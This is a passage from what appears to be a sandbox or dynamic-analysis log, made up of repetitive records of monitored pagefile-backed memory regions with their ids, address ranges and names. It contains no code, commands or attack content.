"pagefile_0x00000000044f0000" filename = "" Region: id = 6612 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6613 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6614 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6615 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6616 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6617 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6618 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6619 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6620 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6621 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6622 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6623 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6624 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6625 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6626 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6627 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6628 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6629 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6630 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6631 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6632 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6633 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6634 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6635 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6636 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6637 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6638 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6639 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6640 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6641 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6642 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6643 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6644 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6645 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6646 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6647 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6648 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6649 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6650 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6651 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6652 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6653 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6654 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6655 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6656 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6657 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6658 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6659 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6660 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6661 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6662 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6663 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6664 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6665 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6666 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6667 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6668 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6669 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6670 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6671 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6672 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6673 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6674 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6675 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6676 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6677 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6678 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6679 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6680 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6681 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6682 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6683 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6684 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6685 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6686 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6687 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6688 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6689 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6690 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6691 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6692 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6693 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6694 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6695 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6696 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6697 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6698 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6699 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6700 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6701 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6702 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6703 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6704 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6705 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6706 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6707 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6708 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6709 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6710 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6711 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6712 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6713 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6714 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6715 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6716 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6717 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6718 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6719 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6720 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6721 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6722 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6723 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6724 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6725 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6726 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6727 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6728 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6729 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6730 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6731 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6732 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6733 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6734 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6735 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6736 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6737 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6738 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6739 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6740 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6741 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6742 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6743 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6744 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6745 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6746 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6747 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6748 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6749 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6750 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6751 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6752 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6753 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6754 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6755 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6756 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6757 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6758 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6759 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6760 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6761 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6762 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6763 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6764 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6765 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6766 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6767 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6768 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6769 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6770 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6771 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6772 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6773 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6774 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6775 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6776 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6777 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6778 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6779 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6780 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6781 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6782 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6783 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6784 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6785 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6786 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6787 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6788 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6789 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6790 start_va = 